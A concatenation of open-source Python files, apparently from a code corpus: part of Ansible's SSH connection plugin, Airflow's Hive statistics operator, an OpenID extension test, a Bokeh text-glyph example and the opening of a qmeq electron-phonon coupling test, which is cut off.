(b"-o", b"User=" + to_bytes(self._play_context.remote_user, errors='surrogate_or_strict')),
u"ANSIBLE_REMOTE_USER/remote_user/ansible_user/user/-u set"
)
self._add_args(
b_command,
(b"-o", b"ConnectTimeout=" + to_bytes(self._play_context.timeout, errors='surrogate_or_strict', nonstring='simplerepr')),
u"ANSIBLE_TIMEOUT/timeout set"
)
# Add in any common or binary-specific arguments from the PlayContext
# (i.e. inventory or task settings or overrides on the command line).
for opt in (u'ssh_common_args', u'{0}_extra_args'.format(binary)):
attr = getattr(self._play_context, opt, None)
if attr is not None:
b_args = [to_bytes(a, errors='surrogate_or_strict') for a in self._split_ssh_args(attr)]
self._add_args(b_command, b_args, u"PlayContext set %s" % opt)
# Check if ControlPersist is enabled and add a ControlPath if one hasn't
# already been set.
controlpersist, controlpath = self._persistence_controls(b_command)
if controlpersist:
self._persistent = True
if not controlpath:
cpdir = unfrackpath(self.control_path_dir)
b_cpdir = to_bytes(cpdir, errors='surrogate_or_strict')
# The directory must exist and be writable.
makedirs_safe(b_cpdir, 0o700)
if not os.access(b_cpdir, os.W_OK):
raise AnsibleError("Cannot write to ControlPath %s" % to_native(cpdir))
if not self.control_path:
self.control_path = self._create_control_path(
self.host,
self.port,
self.user
)
b_args = (b"-o", b"ControlPath=" + to_bytes(self.control_path % dict(directory=cpdir), errors='surrogate_or_strict'))
self._add_args(b_command, b_args, u"found only ControlPersist; added ControlPath")
# Finally, we add any caller-supplied extras.
if other_args:
b_command += [to_bytes(a) for a in other_args]
return b_command
def _send_initial_data(self, fh, in_data):
'''
Writes initial data to the stdin filehandle of the subprocess and closes
it. (The handle must be closed; otherwise, for example, "sftp -b -" will
just hang forever waiting for more commands.)
'''
display.debug('Sending initial data')
try:
fh.write(to_bytes(in_data))
fh.close()
except (OSError, IOError):
raise AnsibleConnectionFailure('SSH Error: data could not be sent to remote host "%s". Make sure this host can be reached over ssh' % self.host)
display.debug('Sent initial data (%d bytes)' % len(in_data))
# Used by _run() to kill processes on failures
@staticmethod
def _terminate_process(p):
""" Terminate a process, ignoring errors """
try:
p.terminate()
except (OSError, IOError):
pass
# This is separate from _run() because we need to do the same thing for stdout
# and stderr.
def _examine_output(self, source, state, b_chunk, sudoable):
'''
Takes a string, extracts complete lines from it, tests to see if they
are a prompt, error message, etc., and sets appropriate flags in self.
Prompt and success lines are removed.
Returns the processed (i.e. possibly-edited) output and the unprocessed
remainder (to be processed with the next chunk) as strings.
'''
output = []
for b_line in b_chunk.splitlines(True):
display_line = to_text(b_line).rstrip('\r\n')
suppress_output = False
# display.debug("Examining line (source=%s, state=%s): '%s'" % (source, state, display_line))
if self._play_context.prompt and self.check_password_prompt(b_line):
display.debug("become_prompt: (source=%s, state=%s): '%s'" % (source, state, display_line))
self._flags['become_prompt'] = True
suppress_output = True
elif self._play_context.success_key and self.check_become_success(b_line):
display.debug("become_success: (source=%s, state=%s): '%s'" % (source, state, display_line))
self._flags['become_success'] = True
suppress_output = True
elif sudoable and self.check_incorrect_password(b_line):
display.debug("become_error: (source=%s, state=%s): '%s'" % (source, state, display_line))
self._flags['become_error'] = True
elif sudoable and self.check_missing_password(b_line):
display.debug("become_nopasswd_error: (source=%s, state=%s): '%s'" % (source, state, display_line))
self._flags['become_nopasswd_error'] = True
if not suppress_output:
output.append(b_line)
# The chunk we read was most likely a series of complete lines, but just
# in case the last line was incomplete (and not a prompt, which we would
# have removed from the output), we retain it to be processed with the
# next chunk.
remainder = b''
if output and not output[-1].endswith(b'\n'):
remainder = output[-1]
output = output[:-1]
return b''.join(output), remainder
def _bare_run(self, cmd, in_data, sudoable=True, checkrc=True):
'''
Starts the command and communicates with it until it ends.
'''
display_cmd = list(map(shlex_quote, map(to_text, cmd)))
display.vvv(u'SSH: EXEC {0}'.format(u' '.join(display_cmd)), host=self.host)
# Start the given command. If we don't need to pipeline data, we can try
# to use a pseudo-tty (ssh will have been invoked with -tt). If we are
# pipelining data, or can't create a pty, we fall back to using plain
# old pipes.
p = None
if isinstance(cmd, (text_type, binary_type)):
cmd = to_bytes(cmd)
else:
cmd = list(map(to_bytes, cmd))
if not in_data:
try:
# Make sure stdin is a proper pty to avoid tcgetattr errors
master, slave = pty.openpty()
if PY3 and self._play_context.password:
p = subprocess.Popen(cmd, stdin=slave, stdout=subprocess.PIPE, stderr=subprocess.PIPE, pass_fds=self.sshpass_pipe)
else:
p = subprocess.Popen(cmd, stdin=slave, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdin = os.fdopen(master, 'wb', 0)
os.close(slave)
except (OSError, IOError):
p = None
if not p:
if PY3 and self._play_context.password:
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, pass_fds=self.sshpass_pipe)
else:
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdin = p.stdin
# If we are using SSH password authentication, write the password into
# the pipe we opened in _build_command.
if self._play_context.password:
os.close(self.sshpass_pipe[0])
try:
os.write(self.sshpass_pipe[1], to_bytes(self._play_context.password) + b'\n')
except OSError as e:
# Ignore broken pipe errors if the sshpass process has exited.
if e.errno != errno.EPIPE or p.poll() is None:
raise
os.close(self.sshpass_pipe[1])
#
# SSH state machine
#
# Now we read and accumulate output from the running process until it
# exits. Depending on the circumstances, we may also need to write an
# escalation password and/or pipelined input to the process.
states = [
'awaiting_prompt', 'awaiting_escalation', 'ready_to_send', 'awaiting_exit'
]
# Are we requesting privilege escalation? Right now, we may be invoked
# to execute sftp/scp with sudoable=True, but we can request escalation
# only when using ssh. Otherwise we can send initial data straightaway.
state = states.index('ready_to_send')
if b'ssh' in cmd:
if self._play_context.prompt:
# We're requesting escalation with a password, so we have to
# wait for a password prompt.
state = states.index('awaiting_prompt')
display.debug(u'Initial state: %s: %s' % (states[state], self._play_context.prompt))
elif self._play_context.become and self._play_context.success_key:
# We're requesting escalation without a password, so we have to
# detect success/failure before sending any initial data.
state = states.index('awaiting_escalation')
display.debug(u'Initial state: %s: %s' % (states[state], self._play_context.success_key))
# We store accumulated stdout and stderr output from the process here,
# but strip any privilege escalation prompt/confirmation lines first.
# Output is accumulated into tmp_*, complete lines are extracted into
# an array, then checked and removed or copied to stdout or stderr. We
# set any flags based on examining the output in self._flags.
b_stdout = b_stderr = b''
b_tmp_stdout = b_tmp_stderr = b''
self._flags = dict(
become_prompt=False, become_success=False,
become_error=False, become_nopasswd_error=False
)
# select timeout should be longer than the connect timeout, otherwise
# they will race each other when we can't connect, and the connect
# timeout usually fails
timeout = 2 + self._play_context.timeout
for fd in (p.stdout, p.stderr):
fcntl.fcntl(fd, fcntl.F_SETFL, fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK)
# TODO: bcoca would like to use SelectSelector() when open
# filehandles is low, then switch to more efficient ones when higher.
# select is faster when filehandles is low.
selector = selectors.DefaultSelector()
selector.register(p.stdout, selectors.EVENT_READ)
selector.register(p.stderr, selectors.EVENT_READ)
# If we can send initial data without waiting for anything, we do so
# before we start polling
if states[state] == 'ready_to_send' and in_data:
self._send_initial_data(stdin, in_data)
state += 1
try:
while True:
poll = p.poll()
events = selector.select(timeout)
# We pay attention to timeouts only while negotiating a prompt.
if not events:
# We timed out
if state <= states.index('awaiting_escalation'):
# If the process has already exited, then it's not really a
# timeout; we'll let the normal error handling deal with it.
if poll is not None:
break
self._terminate_process(p)
raise AnsibleError('Timeout (%ds) waiting for privilege escalation prompt: %s' % (timeout, to_native(b_stdout)))
# Read whatever output is available on stdout and stderr, and stop
# listening to the pipe if it's been closed.
for key, event in events:
if key.fileobj == p.stdout:
b_chunk = p.stdout.read()
if b_chunk == b'':
# stdout has been closed, stop watching it
selector.unregister(p.stdout)
# When ssh has ControlMaster (+ControlPath/Persist) enabled, the
# first connection goes into the background and we never see EOF
# on stderr. If we see EOF on stdout, lower the select timeout
# to reduce the time wasted selecting on stderr if we observe
                            # that the process has not yet exited after this EOF. Otherwise
# we may spend a long timeout period waiting for an EOF that is
# not going to arrive until the persisted connection closes.
timeout = 1
b_tmp_stdout += b_chunk
display.debug("stdout chunk (state=%s):\n>>>%s<<<\n" % (state, to_text(b_chunk)))
elif key.fileobj == p.stderr:
b_chunk = p.stderr.read()
if b_chunk == b'':
# stderr has been closed, stop watching it
selector.unregister(p.stderr)
b_tmp_stderr += b_chunk
display.debug("stderr chunk (state=%s):\n>>>%s<<<\n" % (state, to_text(b_chunk)))
# We examine the output line-by-line until we have negotiated any
# privilege escalation prompt and subsequent success/error message.
# Afterwards, we can accumulate output without looking at it.
if state < states.index('ready_to_send'):
if b_tmp_stdout:
b_output, b_unprocessed = self._examine_output('stdout', states[state], b_tmp_stdout, sudoable)
b_stdout += b_output
b_tmp_stdout = b_unprocessed
if b_tmp_stderr:
b_output, b_unprocessed = self._examine_output('stderr', states[state], b_tmp_stderr, sudoable)
b_stderr += b_output
b_tmp_stderr = b_unprocessed
else:
b_stdout += b_tmp_stdout
b_stderr += b_tmp_stderr
b_tmp_stdout = b_tmp_stderr = b''
# If we see a privilege escalation prompt, we send the password.
# (If we're expecting a prompt but the escalation succeeds, we
# didn't need the password and can carry on regardless.)
if states[state] == 'awaiting_prompt':
if self._flags['become_prompt']:
display.debug('Sending become_pass in response to prompt')
stdin.write(to_bytes(self._play_context.become_pass) + b'\n')
self._flags['become_prompt'] = False
state += 1
elif self._flags['become_success']:
state += 1
# We've requested escalation (with or without a password), now we
# wait for an error message or a successful escalation.
if states[state] == 'awaiting_escalation':
if self._flags['become_success']:
display.debug('Escalation succeeded')
self._flags['become_success'] = False
state += 1
elif self._flags['become_error']:
display.debug('Escalation failed')
self._terminate_process(p)
self._flags['become_error'] = False
raise AnsibleError('Incorrect %s password' % self._play_context.become_method)
elif self._flags['become_nopasswd_error']:
display.debug('Escalation requires password')
self._terminate_process(p)
self._flags['become_nopasswd_error'] = False
raise AnsibleError('Missing %s password' % self._play_context.become_method)
elif self._flags['become_prompt']:
# This shouldn't happen, because we should see the "Sorry,
# try again" message first.
display.debug('Escalation prompt repeated')
self._terminate_process(p)
self._flags['become_prompt'] = False
raise AnsibleError('Incorrect %s password' % self._play_context.become_method)
# Once we're sure that the privilege escalation prompt, if any, has
# been dealt with, we can send any initial data and start waiting
# for output.
if states[state] == 'ready_to_send':
if in_data:
self._send_initial_data(stdin, in_data)
state += 1
# Now we're awaiting_exit: has the child process exited? If it has,
# and we've read all available output from it, we're done.
if poll is not None:
if not selector.get_map() or not events:
break
# We should not see further writes to the stdout/stderr file
# descriptors after the process has closed, set the select
# timeout to gather any last writes we may have missed.
timeout = 0
continue
# If the process has not yet exited, but we've already read EOF from
# its stdout and stderr (and thus no longer watching any file
# descriptors), we can just wait for it to exit.
elif not selector.get_map():
p.wait()
break
# Otherwise there may still be outstanding data to read.
finally:
selector.close()
# close stdin after process is terminated and stdout/stderr are read
# completely (see also issue #848)
stdin.close()
if C.HOST_KEY_CHECKING:
if cmd[0] == b"sshpass" and p.returncode == 6:
raise AnsibleError('Using a SSH password instead of a key is not possible because Host Key checking is enabled and sshpass does not support '
'this. Please add this host\'s fingerprint to your known_hosts file to manage this host.')
controlpersisterror = b'Bad configuration option: ControlPersist' in b_stderr or b'unknown configuration option: ControlPersist' in b_stderr
if p.returncode != 0 and controlpersisterror:
raise AnsibleError('using -c ssh on certain older ssh versions may not support ControlPersist, set ANSIBLE_SSH_ARGS="" '
'(or ssh_args in [ssh_connection] section of the config file) before running again')
# If we find a broken pipe because of ControlPersist timeout expiring (see #16731),
# we raise a special exception so that we can retry a connection.
controlpersist_broken_pipe = b'mux_client_hello_exchange: write packet: Broken pipe' in b_stderr
if p.returncode == 255 and controlpersist_broken_pipe:
raise AnsibleControlPersistBrokenPipeError('SSH Error: data could not be sent because of ControlPersist broken pipe.')
if p.returncode == 255 and in_data and checkrc:
raise AnsibleConnectionFailure('SSH Error: data could not be sent to remote host "%s". Make sure this host can be reached over ssh' % self.host)
return (p.returncode, b_stdout, b_stderr)
@_ssh_retry
def _run(self, cmd, in_data, sudoable=True, checkrc=True):
"""Wrapper around _bare_run that retries the connection
"""
return self._bare_run(cmd, in_data, sudoable, checkrc)
@_ssh_retry
def _file_transport_command(self, in_path, out_path, sftp_action):
# scp and sftp require square brackets for IPv6 addresses, but
# accept them for hostnames and IPv4 addresses too.
host = '[%s]' % self.host
# Transfer methods to try
methods = []
# Use the transfer_method option if set, otherwise use scp_if_ssh
ssh_transfer_method = self._play_context.ssh_transfer_method
if ssh_transfer_method is not None:
if not (ssh_transfer_method in ('smart', 'sftp', 'scp', 'piped')):
raise AnsibleOptionsError('transfer_method needs to be one of [smart|sftp|scp|piped]')
if ssh_transfer_method == 'smart':
methods = ['sftp', 'scp', 'piped']
else:
methods = [ssh_transfer_method]
else:
# since this can be a non-bool now, we need to handle it correctly
scp_if_ssh = C.DEFAULT_SCP_IF_SSH
if not isinstance(scp_if_ssh, bool):
scp_if_ssh = scp_if_ssh.lower()
if scp_if_ssh in BOOLEANS:
scp_if_ssh = boolean(scp_if_ssh, strict=False)
elif scp_if_ssh != 'smart':
raise AnsibleOptionsError('scp_if_ssh needs to be one of [smart|True|False]')
if scp_if_ssh == 'smart':
methods = ['sftp', 'scp', 'piped']
elif scp_if_ssh is True:
methods = ['scp']
else:
methods = ['sftp']
success = False
for method in methods:
returncode = stdout = stderr = None
if method == 'sftp':
cmd = self._build_command('sftp', to_bytes(host))
in_data = u"{0} {1} {2}\n".format(sftp_action, shlex_quote(in_path), shlex_quote(out_path))
in_data = to_bytes(in_data, nonstring='passthru')
(returncode, stdout, stderr) = self._bare_run(cmd, in_data, checkrc=False)
elif method == 'scp':
if sftp_action == 'get':
cmd = self._build_command('scp', u'{0}:{1}'.format(host, shlex_quote(in_path)), out_path)
else:
cmd = self._build_command('scp', in_path, u'{0}:{1}'.format(host, shlex_quote(out_path)))
in_data = None
(returncode, stdout, stderr) = self._bare_run(cmd, in_data, checkrc=False)
elif method == 'piped':
if sftp_action == 'get':
# we pass sudoable=False to disable pty allocation, which
# would end up mixing stdout/stderr and screwing with newlines
(returncode, stdout, stderr) = self.exec_command('dd if=%s bs=%s' % (in_path, BUFSIZE), sudoable=False)
out_file = open(to_bytes(out_path, errors='surrogate_or_strict'), 'wb+')
out_file.write(stdout)
out_file.close()
else:
in_data = open(to_bytes(in_path, errors='surrogate_or_strict'), 'rb').read()
in_data = to_bytes(in_data, nonstring='passthru')
(returncode, stdout, stderr) = self.exec_command('dd of=%s bs=%s' % (out_path, BUFSIZE), in_data=in_data)
# Check the return code and rollover to next method if failed
if returncode == 0:
return (returncode, stdout, stderr)
else:
# If not in smart mode, the data will be printed by the raise below
if len(methods) > 1:
display.warning(msg='%s transfer mechanism failed on %s. Use ANSIBLE_DEBUG=1 to see detailed information' % (method, host))
display.debug(msg='%s' % to_native(stdout))
display.debug(msg='%s' % to_native(stderr))
if returncode == 255:
raise AnsibleConnectionFailure("Failed to connect to the host via %s: %s" % (method, to_native(stderr)))
else:
raise AnsibleError("failed to transfer file to %s %s:\n%s\n%s" %
(to_native(in_path), to_native(out_path), to_native(stdout), to_native(stderr)))
#
# Main public methods
#
def exec_command(self, cmd, in_data=None, sudoable=True):
''' run a command on the remote host '''
super(Connection, self).exec_command(cmd, in_data=in_data, sudoable=sudoable)
display.vvv(u"ESTABLISH SSH CONNECTION FOR USER: {0}".format(self._play_context.remote_user), host=self._play_context.remote_addr)
# we can only use tty when we are not pipelining the modules. piping
# data into /usr/bin/python inside a tty automatically invokes the
# python interactive-mode but the modules are not compatible with the
# interactive-mode ("unexpected indent" mainly because of empty lines)
ssh_executable = self._play_context.ssh_executable
if not in_data and sudoable:
args = (ssh_executable, '-tt', self.host, cmd)
else:
args = (ssh_executable, self.host, cmd)
cmd = self._build_command(*args)
(returncode, stdout, stderr) = self._run(cmd, in_data, sudoable=sudoable)
return (returncode, stdout, stderr)
def put_file(self, in_path, out_path):
''' transfer a file from local to remote '''
super(Connection, self).put_file(in_path, out_path)
display.vvv(u"PUT {0} TO {1}".format(in_path, out_path), host=self.host)
if not os.path.exists(to_bytes(in_path, errors='surrogate_or_strict')):
raise AnsibleFileNotFound("file or module does not exist: {0}".format(to_native(in_path)))
return self._file_transport_command(in_path, out_path, 'put')
def fetch_file(self, in_path, out_path):
''' fetch a file from remote to local '''
super(Connection, self).fetch_file(in_path, out_path)
display.vvv(u"FETCH {0} TO {1}".format(in_path, out_path), host=self.host)
return self._file_transport_command(in_path, out_path, 'get')
def reset(self):
# If we have a persistent ssh connection (ControlPersist), we can ask it to stop listening.
cmd = self._build_command(self._play_context.ssh_executable, '-O', 'stop', self.host)
controlpersist, controlpath = self._persistence_controls(cmd)
if controlpersist:
display.vvv(u'sending stop: %s' % cmd)
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
status_code = p.wait()
if status_code != 0:
raise AnsibleError("Cannot reset connection:\n%s" % stderr)
self.close()
def close(self):
self._connected = False
|
wangtuanjie/airflow
|
refs/heads/master
|
airflow/operators/hive_stats_operator.py
|
38
|
from builtins import str
from builtins import zip
from collections import OrderedDict
import json
import logging
from airflow.utils import AirflowException
from airflow.hooks import PrestoHook, HiveMetastoreHook, MySqlHook
from airflow.models import BaseOperator
from airflow.utils import apply_defaults
class HiveStatsCollectionOperator(BaseOperator):
"""
Gathers partition statistics using a dynamically generated Presto
query, inserts the stats into a MySql table with this format. Stats
overwrite themselves if you rerun the same date/partition.
``
CREATE TABLE hive_stats (
ds VARCHAR(16),
table_name VARCHAR(500),
metric VARCHAR(200),
value BIGINT
);
``
:param table: the source table, in the format ``database.table_name``
:type table: str
:param partition: the source partition
:type partition: dict of {col:value}
:param extra_exprs: dict of expression to run against the table where
keys are metric names and values are Presto compatible expressions
:type extra_exprs: dict
:param col_blacklist: list of columns to blacklist, consider
blacklisting blobs, large json columns, ...
:type col_blacklist: list
:param assignment_func: a function that receives a column name and
        a type, and returns a dict of metric names and Presto expressions.
If None is returned, the global defaults are applied. If an
empty dictionary is returned, no stats are computed for that
column.
:type assignment_func: function
"""
template_fields = ('table', 'partition', 'ds', 'dttm')
ui_color = '#aff7a6'
@apply_defaults
def __init__(
self,
table,
partition,
extra_exprs=None,
col_blacklist=None,
assignment_func=None,
metastore_conn_id='metastore_default',
presto_conn_id='presto_default',
mysql_conn_id='airflow_db',
*args, **kwargs):
super(HiveStatsCollectionOperator, self).__init__(*args, **kwargs)
self.table = table
self.partition = partition
self.extra_exprs = extra_exprs or {}
self.col_blacklist = col_blacklist or {}
self.metastore_conn_id = metastore_conn_id
self.presto_conn_id = presto_conn_id
self.mysql_conn_id = mysql_conn_id
self.assignment_func = assignment_func
self.ds = '{{ ds }}'
self.dttm = '{{ execution_date.isoformat() }}'
def get_default_exprs(self, col, col_type):
if col in self.col_blacklist:
return {}
d = {}
d[(col, 'non_null')] = "COUNT({col})"
if col_type in ['double', 'int', 'bigint', 'float', 'double']:
d[(col, 'sum')] = 'SUM({col})'
d[(col, 'min')] = 'MIN({col})'
d[(col, 'max')] = 'MAX({col})'
d[(col, 'avg')] = 'AVG({col})'
elif col_type == 'boolean':
d[(col, 'true')] = 'SUM(CASE WHEN {col} THEN 1 ELSE 0 END)'
d[(col, 'false')] = 'SUM(CASE WHEN NOT {col} THEN 1 ELSE 0 END)'
elif col_type in ['string']:
d[(col, 'len')] = 'SUM(CAST(LENGTH({col}) AS BIGINT))'
d[(col, 'approx_distinct')] = 'APPROX_DISTINCT({col})'
return {k: v.format(col=col) for k, v in d.items()}
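    # Example of what the defaults above produce (derived from the code, for
    # illustration): for col='id' with col_type='bigint' the returned dict is
    #
    #     {('id', 'non_null'): 'COUNT(id)', ('id', 'sum'): 'SUM(id)',
    #      ('id', 'min'): 'MIN(id)', ('id', 'max'): 'MAX(id)',
    #      ('id', 'avg'): 'AVG(id)'}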
def execute(self, context=None):
metastore = HiveMetastoreHook(metastore_conn_id=self.metastore_conn_id)
table = metastore.get_table(table_name=self.table)
field_types = {col.name: col.type for col in table.sd.cols}
exprs = {
('', 'count'): 'COUNT(*)'
}
for col, col_type in list(field_types.items()):
d = {}
if self.assignment_func:
d = self.assignment_func(col, col_type)
if d is None:
d = self.get_default_exprs(col, col_type)
else:
d = self.get_default_exprs(col, col_type)
exprs.update(d)
exprs.update(self.extra_exprs)
exprs = OrderedDict(exprs)
exprs_str = ",\n ".join([
v + " AS " + k[0] + '__' + k[1]
for k, v in exprs.items()])
where_clause = [
"{0} = '{1}'".format(k, v) for k, v in self.partition.items()]
where_clause = " AND\n ".join(where_clause)
sql = """
SELECT
{exprs_str}
FROM {self.table}
WHERE
{where_clause};
""".format(**locals())
hook = PrestoHook(presto_conn_id=self.presto_conn_id)
logging.info('Executing SQL check: ' + sql)
row = hook.get_first(hql=sql)
logging.info("Record: " + str(row))
if not row:
raise AirflowException("The query returned None")
part_json = json.dumps(self.partition, sort_keys=True)
logging.info("Deleting rows from previous runs if they exist")
mysql = MySqlHook(self.mysql_conn_id)
sql = """
SELECT 1 FROM hive_stats
WHERE
table_name='{self.table}' AND
partition_repr='{part_json}' AND
dttm='{self.dttm}'
LIMIT 1;
""".format(**locals())
if mysql.get_records(sql):
sql = """
DELETE FROM hive_stats
WHERE
table_name='{self.table}' AND
partition_repr='{part_json}' AND
dttm='{self.dttm}';
""".format(**locals())
mysql.run(sql)
logging.info("Pivoting and loading cells into the Airflow db")
rows = [
(self.ds, self.dttm, self.table, part_json) +
(r[0][0], r[0][1], r[1])
for r in zip(exprs, row)]
mysql.insert_rows(
table='hive_stats',
rows=rows,
target_fields=[
'ds',
'dttm',
'table_name',
'partition_repr',
'col',
'metric',
'value',
]
)
|
jcnelson/syndicate
|
refs/heads/master
|
old/ms/openid/test/test_extension.py
|
77
|
from openid import extension
from openid import message
import unittest
class DummyExtension(extension.Extension):
ns_uri = 'http://an.extension/'
ns_alias = 'dummy'
def getExtensionArgs(self):
return {}
class ToMessageTest(unittest.TestCase):
def test_OpenID1(self):
oid1_msg = message.Message(message.OPENID1_NS)
ext = DummyExtension()
ext.toMessage(oid1_msg)
namespaces = oid1_msg.namespaces
self.failUnless(namespaces.isImplicit(DummyExtension.ns_uri))
self.failUnlessEqual(
DummyExtension.ns_uri,
namespaces.getNamespaceURI(DummyExtension.ns_alias))
self.failUnlessEqual(DummyExtension.ns_alias,
namespaces.getAlias(DummyExtension.ns_uri))
def test_OpenID2(self):
oid2_msg = message.Message(message.OPENID2_NS)
ext = DummyExtension()
ext.toMessage(oid2_msg)
namespaces = oid2_msg.namespaces
self.failIf(namespaces.isImplicit(DummyExtension.ns_uri))
self.failUnlessEqual(
DummyExtension.ns_uri,
namespaces.getNamespaceURI(DummyExtension.ns_alias))
self.failUnlessEqual(DummyExtension.ns_alias,
namespaces.getAlias(DummyExtension.ns_uri))
|
almarklein/bokeh
|
refs/heads/master
|
tests/glyphs/Text.py
|
1
|
import numpy as np
from bokeh.document import Document
from bokeh.models import ColumnDataSource, DataRange1d, Plot, LinearAxis, Grid
from bokeh.models.glyphs import Text
from bokeh.plotting import show
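# Render rotated three-letter text labels along the parabola y = x**2 using the
# low-level bokeh.models plot assembly.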
N = 9
x = np.linspace(-2, 2, N)
y = x**2
a = "abcdefghijklmnopqrstuvwxyz"
text = [a[i*3:i*3+3] for i in range(N)]
source = ColumnDataSource(dict(x=x, y=y, text=text))
xdr = DataRange1d(sources=[source.columns("x")])
ydr = DataRange1d(sources=[source.columns("y")])
plot = Plot(
title=None, x_range=xdr, y_range=ydr, plot_width=300, plot_height=300,
h_symmetry=False, v_symmetry=False, min_border=0, toolbar_location=None)
glyph = Text(x="x", y="y", text="text", angle=0.3, text_color="#96deb3")
plot.add_glyph(source, glyph)
xaxis = LinearAxis()
plot.add_layout(xaxis, 'below')
yaxis = LinearAxis()
plot.add_layout(yaxis, 'left')
plot.add_layout(Grid(dimension=0, ticker=xaxis.ticker))
plot.add_layout(Grid(dimension=1, ticker=yaxis.ticker))
doc = Document()
doc.add(plot)
show(plot)
|
gedaskir/qmeq
|
refs/heads/master
|
qmeq/tests/test_baths.py
|
1
|
from numpy.linalg import norm
from qmeq.indexing import StateIndexing
from qmeq.baths import *
from qmeq.tests.test_leadstun import ParametersDoubleDotSpinful
EPS = 1e-14
class ParametersDoubleDotSpinfulElPh(ParametersDoubleDotSpinful):
def __init__(self):
ParametersDoubleDotSpinful.__init__(self)
self.nbaths = 2
self.velph = {
(0,0,0):1, (0,1,1):2, (0,0,1):1j, (0,1,0):1j, # bath 1, spin up
(1,0,0):3, (1,1,1):4, (1,0,1):2j, (1,1,0):2j, # bath 2, spin up
(0,2,2):1, (0,3,3):2, (0,2,3):1j, (0,3,2):1j, # bath 1, spin down
(1,2,2):3, (1,3,3):4, (1,2,3):2j, (1,3,2):2j, # bath 2, spin down
}
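# elph_construct_Vbbp must reproduce the hard-coded reference electron-phonon
# coupling matrices for every supported state-indexing scheme.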
def test_construct_Vbbp():
data = {'Lin': [[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 2, 0, 0, 0, 1j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 4, 1j, 0, 0, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1j, 3, 0, 0, 0, 1j, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 1j, 0, 0, 0, 0], [0, 0, 0, 0, 1j, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1j, 0, 0, 0, 3, 1j, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 0, 0, 1j, 2, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 1j, 0, 0, 0, 4, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6]], [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 4, 0, 0, 0, 2j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 8, 2j, 0, 0, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 2j, 7, 0, 0, 0, 2j, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 11, 0, 0, 0, 2j, 0, 0, 0, 0], [0, 0, 0, 0, 2j, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 2j, 0, 0, 0, 7, 2j, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 0, 0, 2j, 6, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 2j, 0, 0, 0, 10, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14]]],
